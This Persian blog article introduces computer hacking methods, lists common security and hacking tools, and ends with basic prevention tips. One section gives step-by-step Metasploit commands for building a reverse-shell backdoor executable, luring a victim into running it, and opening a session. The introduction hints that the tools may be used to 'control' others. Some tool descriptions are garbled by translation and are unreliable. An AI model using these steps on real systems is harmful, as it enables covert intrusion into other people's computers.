هک کامپیوتر با روش های متفاوت نفوذی و جلوگیری از هک شدن سیستم کامپیوتری شما

هک کامپیوتر با روشهای متفاوت نفوذی و جلوگیری از هک شدن

نرم افزار اتصال گوشی به تلویزیون
نرم افزار اتصال گوشی به تلویزیون پخش فیلم ، موزیک و عکس
جولای 25, 2017
خرابی دکمه هوم آیفون را چگونه می توان درست کرد ؟
جولای 26, 2017

هک کامپیوتر با روشهای متفاوت نفوذی و جلوگیری از هک شدن

هک کامپیوتر

هک کامپیوتر

هک کامپیوتر ، هک ویندوز ، هک گوشی و به طور کلی واژه هک و جاسوسی ، امروزه یکی از پرکاربردترین واژه ها و کارهایی است که  در دنیای تکنولوژی دنبال می شود افراد بسیار زیادی به دنبال روش های هک و نفوذ به سیستم های کامپیوتری می باشند.

از آنجایی که این روز ها افراد زیادی از کامپیوتر و لپتاپ استفاده می کنند. این باعث می شود که افراد بیشتری هم در معرض هک باشند. بنابراین به این موضوع دقت داشته باشید که بدون در نظر گرفتن موارد امنیتی نمی توانید امنیت خود را حفظ کنید.

با توجه به خواسته های بیشمار افراد که به دنبال یافتن راهی برای هک دیگران و البته جلوگیری از هک سیستم های خودشان هستند، باعث می شوند اهمیت بیشتری به این موضوع بدهند.

به طور کلی هک کامپیوتر به چه شیوه ای انجام می شود ؟

اکثر افراد آشنایی زیادی با واژه هک ندارند، با این حال علاقه زیادی دارند که به علت های شخصی به اطلاعات دیگران دسترسی پیدا کنند. شما می توانید به مطالعه مطالب پیشین ما که در رابطه با آموزش انواع هک و هکرهای مختلف می باشد بپردازید .

در این مقاله نیز می خواهیم به شما انواع روش های هک کامپیوتر را معرفی کنیم. دقت داشته باشید که به هیچ عنوان نباید از این روش ها هک برای ورود به حریم خصوصی دیگران استفاده کنید. اما در صورتی که شرایط خاصی وجود دارد می توانید برای کنترل از انواع نرم افزار های معرفی شده بهره ببرید.

روشی که بیشتربرای هک کامپیوتر استفاده می شود دسترسی به کامپیوتر و اطلاعات فرد قربانی از طریق شبکه یا اینترنت می باشد. از این طریق هکر با استفاده از یک برنامه یا لینک های آلوده، اقدام به هک کامپیوتر فرد می نماید. انواع روش های هک کامپیوتر در ادامه ذکر شده است.

هک  کامپیوتر با استفاده از لینک های آلوده

روش دیگری برای هک کامپیوتر و نفوذ به آن، راغب کردن کاربر قربانی به کلیک بروی لینک های آلوده است . هکر در این روش، اقدام به جذب کاربر برای کلیک روی لینک آلوده می کند.

برای مثال هکر با وعده هایی  توخالی و وسوسه انگیز نظیر نمایش فیلمی مخفی از افراد مشهور یا وعده ی شرکت در قرعه کشی، برای کاربر به نوعی دام پهن می نماید و از آن طریق کاربر را مجاب می کند که روی لینک مخرب کلیک نماید. پس از کلیک روی این لینک برنامه ای در پشت پرده اقدام به سرقت اطلاعات کاربر خواهد نمود.

هک با استفاده از IP و بطور مستقیم

یکی از سخت ترین روش های هک کامپیوتر که هکرهای معمولی قادر به انجام آن نیستند، روش هک به صورت مستقیم و بدون استفاده از برنامه ای خاص می باشد. هکرهایی که از این روش استفاده می کنند از دانش برنامه نویسی بسیار بالایی بهره مند هستند که با استفاده از سیستم عامل کالی لینوکس یا بکترک لینوکس، به سیستم قربانی در شبکه متصل می شوند و سپس آن را هک می کنند. از آنجایی که این هکرها دانش بالایی در این زمینه دارند، می دانند که سیستم قربانی از چه قسمت هایی آسیب پذیر می باشد و از همان قسمت ها استفاده کرده و به سیستم نفوذ می کنند.

هک کامپیوتر

روش های هک کامپیوتر

هک کامپیوتر به وسیله کالی لینوکس

هکرها به راحتی می توانند سیستم کامپیوتر شما را با استفاده از کالی لینوکس هک نمایند، اکنون این روش را برای شما توضیح خواهیم داد تا ببینید هکرها چگونه به سادگی سیستم شما را هک می کنند و بتوانید از هک کامپیوتر خود جلوگیری نمایید.

در اولین مرحله هکر سیستم کالی لینوکس خود را باز می کند، سپس وارد محیط ترمینال لینوکس می شود. بعد از آن برای وارد شدن به محیط متاسپلوییت دستور msfconsole را وارد می کند.

در مرحله دوم با استفاده از دستور msfpayload windows/meterpreter/reverse_tcp LHOST=SourceIPAdress X > Desktop/Backdoor.exe به جای آدرس آی پی LHOST آدرس آی پی سیستم خود را قرار می دهند. با انجام این مرحله هکر می تواند یک در پشتی در سیستم کالی لینوکس بسازد.

اکنون باید فرد مورد نظر خود را ترغیب کند که روی فایل ساخته شده کلیک نماید. هکرها این کار را با استفاده از شیوه های مهندسی اجتماعی انجام می دهند و معمولا هم موفق می شوند که قربانی را وادار به کلیک برروی فایل ایجاد شده کنند.

بعد از انجام مراحل بالا هکر در همان خط فرمانی که هست دستور use exploit/multi/handler را وارد می کند. و سپس خط جدید دستور set payload windows/meterpreter/reverse_tcp را نیز وارد می کند. حال همان آدرس آی پی خود را با دستور set lhost IPAdress در قسمت IPAdress قرار می دهد. بعد از اتمام این مراحل عبارت exploit -j –z را وارد نموده تا ماژول handler شروع به کار کند.

زمانی که شما به عنوان قربانی برنامه ای که هکر ساخته است را اجرا نمایید در محیط متااسپلوییت یک آلارم با موضوع این که یک نشست جدید در برنامه ایجاد شده است نمایش داده می شود. هکر برای ایجاد ارتباط با این نشست دستور sessions -i 1 را وارد می کند.

اکنون دیگر کار تمام است و اولین نشست هکر با سیستم شما برقرار می شود. بعد از این مرحله هکر به تمام اطلاعات شما دسترسی پیدا کرده و می تواند هر فایلی را که بخواهد باز کرده و ببیند.

نرم افزار های هک کامپیوتر

ما لیستی از برترین نرم افزارها و ابزارهای هکری سال 2019 را با بهترین ویژگی ها جمع آوری کرده ایم. این لیست براساس بررسی های آماری، بازخورد شما و تجربه خود ما است. این لیست در مورد بهترین نرم افزار مورد استفاده برای اهداف هکینگ شامل اسکنرهای پورت ، اسکنر آسیب پذیری وب ، رمزهای عبور ، ابزارهای هک قانونی ، تجزیه و تحلیل ترافیک و ابزارهای مهندسی اجتماعی به شما می گوید.

سلب مسئولیت: ما این مقاله را فقط برای اهداف آموزشی منتشر می کنیم . بنابراین اقدامات مخرب را تبلیغ نمی کنیم. از این ابزارها فقط برای اهداف اخلاقی استفاده کنید.

1. متاسپلویت | بهترین مجموعه ابزارهای بهره برداری metaspoit بهترین ابزار هک 2016

من به جای اینکه Metasploit را مجموعه ای از ابزارهای سوء استفاده بنامم ، آن را زیرساختی میدانم که می توانید برای ساختن ابزارهای سفارشی خود استفاده کنید. این نرم افزار رایگان یکی از محبوب ترین ابزارهای امنیت رایانه ای است .که به شما امکان می دهد نقاط آسیب پذیری را در سیستم عامل های مختلف تعیین کنید. بیش از 200000 کاربر و مشارکت کننده از Metasploit پشتیبانی می کنند. که به شما کمک می کنند بینایی کسب کرده و نقاط ضعف سیستم خود را کشف کنید.

این بسته برتر ابزار هک سال 2019 به شما امکان می دهد حملات در دنیای واقعی را شبیه سازی کنید .تا از نقاط ضعف به شما بگوید و آنها را پیدا کنید. به عنوان یک تست نفوذ ، آسیب پذیری های Nexpose را با یکپارچه سازی حلقه بسته با استفاده از گزارش های Top اصلاح می کند. با استفاده از چارچوب متن باز Metasploit ، کاربران می توانند ابزارهای خود را بسازند و بهترین استفاده را از این ابزار هک چند منظوره ببرند.

سیستم عامل های پشتیبانی شده:

Metasploit برای همه سیستم عامل های بزرگ از جمله ویندوز ، لینوکس و OS X در دسترس است.

2. Acunetix WVS | آسیب پذیری اسکنر

Acunetix یک اسکنر آسیب پذیری وب (WVS) است .که معایب موجود در یک وب سایت را اسکن و کشف می کند که می تواند کشنده باشد. این ابزار چند رشته ای وب سایتی را جستجو می کند و از اسکریپت نویسی Cross-site ، تزریق SQL و سایر آسیب پذیری ها مطلع می شود. این ابزار سریع و آسان برای استفاده از بیش از 1200 آسیب پذیری در وردپرس ، وب سایت های وردپرس را اسکن می کند.

Acunetix دارای یک ضبط کننده توالی ورود به سیستم است. که به شما امکان می دهد به مناطق محافظت شده با رمز عبور در وب سایت ها دسترسی پیدا کنید. فناوری جدید AcuSensor استفاده شده در این ابزار به شما امکان می دهد میزان مثبت کاذب را کاهش دهید. چنین ویژگی هایی Acunetix WVS را به یک ابزار هک ترجیحی تبدیل کرده است که باید در سال 2019 بررسی کنید.

سیستم عامل های پشتیبانی شده:

Acunetix برای ویندوز XP و بالاتر در دسترس است.

هک کامپیوتر

آموزش هک کامپیوتر با نرم افزار

3. Nmap | Port scanner toolzenmap- بهترین ابزار هک 2016

Nmap – همچنین به عنوان Network Mapper شناخته می شود .این نرم افزار هک کامپیوتر در گروه ابزار اسکنر پورت قرار می گیرد. این ابزار هک رایگان و منبع باز محبوب ترین ابزار اسکن پورت است که امکان کشف کارآمد شبکه و ممیزی امنیتی را فراهم می کند.

Nmap که برای دامنه وسیعی از خدمات استفاده می شود ، از بسته های IP خام برای تعیین میزبان های موجود در شبکه ، خدمات آنها همراه با جزئیات ، سیستم عامل های مورد استفاده میزبان ها ، نوع فایروال استفاده شده و سایر اطلاعات استفاده می کند.

سال گذشته ، Nmap برنده چندین جایزه امنیتی سال شد . همچنین در چندین فیلم از جمله The Matrix Reloaded ، Die Hard 4 و دیگران حضور داشت. Nmap قابل اجرا در خط فرمان ، همچنین در یک آواتار GUI پیشرفته ارائه می شود.

سیستم عامل های پشتیبانی شده :

Nmap برای همه سیستم عامل های بزرگ از جمله ویندوز ، لینوکس و OS X در دسترس است.

4. Wireshark | Packet analyzerwireshark – بهترین ابزار هک 2016

Wireshark یک ابزار ساخت بسته شناخته شده است. که آسیب پذیری درون شبکه را کشف می کند و مجموعه قوانین مربوط به فایروال را بررسی می کند. توسط هزاران متخصص امنیت برای تجزیه و تحلیل شبکه ها و اسکن عمیق صدها پروتکل مورد استفاده قرار می گیرد. Wireshark به شما کمک می کند تا داده های زنده را از Ethernet ، IEEE 802.11 ، PPP / HDLC ، ATM ، بلوتوث ، USB ، Token Ring ، Frame Relay ، FDDI و … دریافت کنید.

این ابزار رایگان و منبع باز در اصل Ethereal نامگذاری شد. Wireshark همچنین در نسخه خط فرمان بنام TShark عرضه می شود.
سیستم عامل های پشتیبانی شده:

این تحلیلگر پروتکل شبکه مبتنی بر Qt بر روی لینوکس ، ویندوز و سیستم عامل X با سهولت اجرا می شود.

5. oclHashcat | بهترین ابزار هک کردن رمزگذاری رمز عبور tooloclhashcat 2016

اگر شکستن رمز عبور و هک کامپیوتر کاری است که روزانه انجام می دهید ، ممکن است از ابزار رایگان رمز عبور رمز Hashcat آگاه باشید.  Hashcat ابزاری برای شکستن رمز عبور مبتنی بر پردازنده است . oclHashcat نسخه پیشرفته آن است که از قدرت پردازنده گرافیکی شما برای هک کامپیوتر استفاده می کند.

oclHashcat خود را با اولین و تنها موتور مبتنی بر GPGPU در جهان سریعترین ابزار شکستن رمز عبور در جهان می نامد. برای استفاده از این ابزار ، کاربران NVIDIA به ForceWa نیاز دارند.

کاربران AMD Catalyst 15.7 یا بالاتر نیاز دارند.

این ابزار از حالت های حمله زیر برای کرک استفاده می کند:

Straight
ترکیبی
بی رحمانه
ترکیبی

با ذکر ویژگی مهم دیگر ، oclHashcat ابزاری منبع باز تحت مجوز MIT است که امکان ادغام یا بسته بندی توزیع های رایج لینوکس را فراهم می کند.
سیستم عامل های پشتیبانی شده:

این ابزار شکستن رمز عبور مفید را می توان در نسخه های مختلف برای Linux ، OSX و Windows بارگیری کرد.

6. نسوس | آسیب پذیری اسکنر

این ابزار برتر رایگان امنیتی سال 2019 با کمک یک چارچوب سرویس گیرنده-سرور کار می کند. این ابزار توسط Tenable Network Security توسعه یافته است .و  یکی از محبوب ترین اسکنرهای آسیب پذیری است که در اختیار ما قرار دارد. Nessus اهداف مختلفی را در اختیار انواع مختلف کاربران قرار می دهد .Nessus Home ، Nessus Professional ، Nessus Manager و Nessus Cloudاین انواع هستند.

با استفاده از Nessus ، می توان چندین نوع آسیب پذیری را که شامل تشخیص نقص دسترسی از راه دور ، هشدار پیکربندی اشتباه ، انکار خدمات در برابر پشته TCP / IP ، آماده سازی ممیزی های PCI DSS . شناسایی بدافزار ، جستجوی داده های حساس و غیره را اسکن کرد تا Nessus حمله دیکشنری  را انجام دهد.

جدا از ویژگی های اساسی فوق الذکر ، از Nessus می توان برای اسکن چندین شبکه در IPv4 ، IPv6 و شبکه های ترکیبی استفاده کرد. می توانید اسکن برنامه ریزی شده را تنظیم کنید. تا در زمان انتخاب شده شما اجرا شود .با استفاده از اسکن مجدد میزبان انتخابی ، همه یا زیرمجموعه ای از میزبانهای اسکن شده را دوباره اسکن کنید.
سیستم عامل های پشتیبانی شده:

Nessus توسط سیستم عامل های مختلفی از جمله ویندوز 7 و 8 ، Mac OS X و توزیع های محبوب لینوکس مانند دبیان ، اوبونتو ، کالی لینوکس و غیره پشتیبانی می شود.

هک کامپیوتر

هک کامپیوتر با نرم افزار

7. مالتگو | پلتفرم پزشکی قانونی بهترین ابزار هک Maltego-Screen 2016

Maltego یک پلتفرم پزشکی قانونی منبع باز است. که استخراج دقیق اطلاعات و جمع آوری اطلاعات را برای ترسیم تهدیدهای سایبری در اطراف شما ارائه می دهد. Maltego در نشان دادن پیچیدگی و شدت نقاط خرابی در زیرساخت های شما و محیط اطراف بسیار عالی است.

Maltego یک ابزار هکر عالی است .که پیوندهای دنیای واقعی بین افراد ، شرکت ها ، وب سایت ها ، دامنه ها ، نام های DNS ، آدرس های IP ، اسناد و موارد دیگر را تجزیه و تحلیل می کند. بر اساس جاوا ، این ابزار در یک رابط گرافیکی با کاربرد آسان همراه با گزینه های سفارشی سازی از دست رفته هنگام اسکن ، اجرا می شود.

سیستم عامل های پشتیبانی شده:

ابزار امنیتی Maltego برای ویندوز ، مک و لینوکس موجود است.

8. Social-Engineer Toolkitsocial مهندس جعبه ابزار بهترین ابزار هک 2016

TrustedSec’s Social-Engineer Toolkit همچنین در آقای ربات وجود دارد.! چارچوبی پیشرفته برای شبیه سازی انواع مختلف حملات مهندسی اجتماعی مانند برداشت اعتبارنامه ، حملات فیشینگ و موارد دیگر است.

این ابزار مبتنی بر پایتون با بیش از دو میلیون بار دانلود، ابزار استاندارد آزمونهای نفوذ مهندسی اجتماعی است. حملات را خودکار می کند و ایمیل های مبدل ، صفحات وب مخرب و موارد دیگر ایجاد می کند.
سیستم عامل های پشتیبانی شده:

جدا از لینوکس ، Social-Engineer Toolkit تا حدی در Mac OS X و Windows پشتیبانی می شود.

هک کامپیوتر

9. نت اسپارکر | برنامه وب scannernetsparker-hacking-tool

Netsparker یک اسکنر محبوب برنامه های وب است .که اشکالاتی مانند تزریق SQL و القای فایل محلی را پیدا می کند . اقدامات درمانی را فقط به صورت خواندنی و ایمن پیشنهاد می کند. از آنجا که این ابزار هک اثبات بهره برداری را تولید می کند ، نیازی نیست که خودتان آسیب پذیری را تأیید کنید. درصورتی که نتواند به صورت خودکار نقصی را تأیید کند ، به شما هشدار می دهد. شروع این ابزار هک بسیار آسان است. به سادگی URL را وارد کنید و اجازه دهید اسکن شود. Netsparker از برنامه های مبتنی بر JavaScript و AJAX پشتیبانی می کند. بنابراین ، برای اسکن انواع مختلف برنامه های وب نیازی به پیکربندی اسکنر یا تکیه بر برخی تنظیمات پیچیده اسکن نیست.

اگر نمی خواهید برای نسخه حرفه ای Netsparker پول بپردازید ، آنها همچنین نسخه آزمایشی دارند که می توانید از آن استفاده کنید.
سیستم عامل های پشتیبانی شده:

اسکنر برنامه وب Netsparker برای ویندوز در دسترس است. پس می توانید به راحتی از آن برای هک کامپیوتر البته به صورت اخلاقی استفاده کنید!.

10. w3af | برنامه وب scannerw3af-hacking-tool-2017

w3af اسکنر امنیتی برنامه های وب رایگان و منبع باز است. که به طور گسترده توسط هکرها و آزمایش کنندگان نفوذ استفاده می شود. w3af مخفف کلمه چارچوب حمله برنامه و وب است. با استفاده از این ابزار هک کردن ، می توان اطلاعات مربوط به آسیب پذیری امنیتی را دریافت کرد که می تواند بیشتر در تعاملات آزمایش نفوذ استفاده شود. w3af ادعا می کند بیش از 200 آسیب پذیری (از جمله مواردی مانند برنامه نویسی میان سایت ، تزریق SQL ، تنظیمات نامناسب پی اچ پی ، مدارک معتبر و خطاهای برنامه بدون کنترل) را شناسایی کرده و یک برنامه وب (و وب سایت) را ایمن تر می کند.

w3af هم متناسب با نیازهای یک هکر در خط فرمان و هم رابط کاربری گرافیکی ارائه می شود. در کمتر از 5 کلیک و استفاده از نمایه از پیش تعریف شده برای مبتدیان ، می توان امنیت یک برنامه وب را بررسی کرد. همانطور که به خوبی مستند شده است ، کاربران جدید می توانند به راحتی راه خود را پیدا کنند. به عنوان یک ابزار هک منبع باز ، یک توسعه دهنده با تجربه می تواند با کد بازی کند .یا ویژگی های جدیدی اضافه کند و چیز جدیدی ایجاد کند.
سیستم عامل های پشتیبانی شده:

w3af برای Linux ، BSD و OS X در دسترس است. در ویندوز ، نسخه های قدیمی آن پشتیبانی می شوند.

11. جان ریپر  John The Ripper

وقتی نوبت به ابزارهای رمز شکن می رسد ، John Ripper بهترین گزینه در بین اکثر هکرهای اخلاقی است. این نرم افزار رایگان و منبع باز به صورت کد منبع توزیع می شود.

John The Ripper در اصل به زبان برنامه نویسی C نوشته شده است. به دلیل اینکه ترکیبی از بسیاری از رمزهای عبور رمزگذار است ، این یک مقام قادر به دستیابی به یک همراه عالی است. ماژول های مختلف این امکان را به شما می دهد تا رمزهای عبور را با استفاده از تکنیک های مختلف رمزگذاری رمزگذاری کند.
سیستم عامل های پشتیبانی شده.:

نرم افزار هک John The Ripper در سیستم عامل های مختلفی از جمله ویندوز ، لینوکس ، DOS ، OpenVMS و یونیکس در دسترس است.

12. Aircrack-ng | ابزار شکستن رمز عبور

وقتی صحبت از شکستن رمز عبور می شود ، گزینه Aircrack-ng گزینه دیگری است که می توانید معرفی کنید. این مجموعه شبکه متشکل از ردیاب ، ترفند فروشنده و ابزار رمز عبور رمز عبور است. همه این ابزارها مبتنی بر خط فرمان هستند و امکان نوشتن و اضافه کردن کد را دارند.

با استفاده از نرم افزار هک Aircrack-ng ، می توانید بسته ها را ضبط کنید . داده ها را به پرونده های متنی صادر کنید ، حملات مختلف را انجام دهید .، قابلیت های کارت های WiFi و درایورها را بررسی کنید ، WEP و WPA PSK که مربوط به امنیت وای فای هستند را خراب کنید.
سیستم عامل های پشتیبانی شده:

Aircrack-ng برای سیستم عامل های مختلف مانند macOS ، Linux ، FreeBSD ، Windows در دسترس است. نسخه لینوکس نیز به اندروید منتقل شده است.

13. Ghidra | ابزار مهندسی معکوس

Ghidra ابزار مهندسی معکوس و هک کامپیوتر ساخت داخل NSA است. که اخیراً توسط آژانس آمریکایی تهیه شده است. طبق NSA ، از این ابزار برای کاوش در بدافزارها و نرم افزارها به منظور کشف نقاط ضعف قابل استفاده استفاده می شود.

یکی از مهمترین ویژگیهای این نرم افزار هک کردن ، قابلیت پشتیبانی از چند کاربر است .که به محققان امکان همکاری و مهندسی معکوس را می دهد. همچنین می توان از API در معرض استفاده و پلاگین و افزودنیهای Ghidra خود را برای قابلیت های اضافی ایجاد کرد.

جلوگیری از هک کامپیوتر

هک کامپیوتر

آموزش روش های جلوگیری از هک کامپیوتر

همانطور که مشاهده نمودید سیستم شما همیشه در معرض هک شدن قرار دارد و هکرها به راحتی و حتی با داشتن دانشی اندک می توانند به سیستم شما نفوذ کرده و به تمام اطلاعات شما دسترسی پیدا کنند.

بنابراین برای جلوگیری از هک کامپیوتر خود می بایست اول از همه برنامه های ضد هک و آنتی ویروس هایی را بر روی سیستم خود نصب نمایید که بتوانند برنامه های مخرب را تشخیص داده و از هک شدن سیستم شما جلوگیری کنند. یکی از این برنامه ها، نرم افزار Anti Spy می باشد که برای کسب اطلاعات بیشتر درباره این نرم افزار می توانید به لینک مربوطه مراجعه کنید.

علاوه بر این نیز باید مراقب فایل ها و لینک هایی که برایتان ارسال می شود باشید و برروی لینک های ناشناخته و مشکوک کلیک ننمایید. همچنین از دانلود برنامه ها از منابع ناشناخته و نامعتبر به شدت خودداری کرده و برنامه های مورد نیاز خود را از منابع معتبر مانند گوگل پلی دانلود نمایید.

سیستم ، مرورگر و برنامه های مهم خود را به طور مرتب به روز کنید . در صورت وجود به روزرسانی خودکار ، از آن استفاده کنید. این به روزرسانی ها می توانند نقایص نرم افزاری را که به هکرها امکان مشاهده فعالیت شما یا سرقت اطلاعات را می دهد ، از بین ببرند.

در آخر هم به بدیهی ترین چیز برای جلوگیری از هک کامپیوتر یعنی گذاشتن پسورد کامپیوتر و همچنین قرار ندادن آن در اختیار افراد غریبه توجه کنید.

davood15229
davood15229
من سی و هفت سال دارم دارای مدرک فوق لیسنانس در رشته مدیریت مهندسی نرم‌افزار و طراحی نرم افزار هستم .. در حال حاضر در حوزه نرم افزار های نظارتی فعالیت دارم و علاقه مند به حوزه هوش مصنوعی هستم

دیدگاهتان را بنویسید

error: Content is protected !!